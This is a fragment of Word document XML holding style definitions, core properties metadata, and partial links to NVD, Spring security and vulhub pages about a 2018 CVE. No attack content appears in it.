    <w:rsid w:val="00B50C17"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00B50C17"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B50C17"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A8">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00B50C17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character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F151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151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432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C319F5"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00441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vd.nist.gov/vuln/detail/CVE-2018-127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pring.io/security/cve-2018-12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security/cve-2018-127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ulhub/vul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forever lazy</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-24T09:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27T19:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>